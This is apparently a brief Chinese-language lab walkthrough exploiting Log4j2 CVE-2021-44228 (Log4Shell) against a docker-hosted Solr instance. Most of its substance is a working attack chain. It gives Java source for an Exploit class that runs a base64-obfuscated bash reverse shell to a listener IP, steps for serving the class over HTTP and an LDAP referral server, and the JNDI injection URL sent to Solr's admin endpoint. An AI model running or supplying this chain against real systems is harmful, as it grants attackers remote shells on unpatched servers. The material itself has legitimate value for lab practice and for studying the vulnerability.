Log4j2-CVE-2021-44228
Log4j2-CVE-2021-44228
Black 天启互联网实验室 2023-12-26 19:54
一、环境搭建
机器:kali Linux
Java:jdk8
python:python3.7.x
二、在docker里面搭建靶机环境
三、访问
四、构造payload
五、替换
将上面构造好的反弹shell语句替换
import java.lang.Runtime;import java.lang.Process;public class Exploit { public Exploit(){ try{
Runtime.getRuntime().exec(“bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}”); }catch(Exception e){ e.printStackTrace(); } } public static void main(String[] argv){ Exploit e = new Exploit(); }}
将上面文件放进Exploit.java文件,在Windows用javac进行编译成Exploit.class,记得切换成 jdk8!
然后放进kali里面查看
六、开启恶意站点
用python在含有java.class开启http服务
访问一下,看看效果
七、用marshalsec-0.0.3-SNAPSHOT-all.jar插件开启LADP监听
八、开启监听端口
九、传入恶意参数
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://192.168.217.128:1389/Exploit}
十、查看效果
如上图所示即反弹shell成功!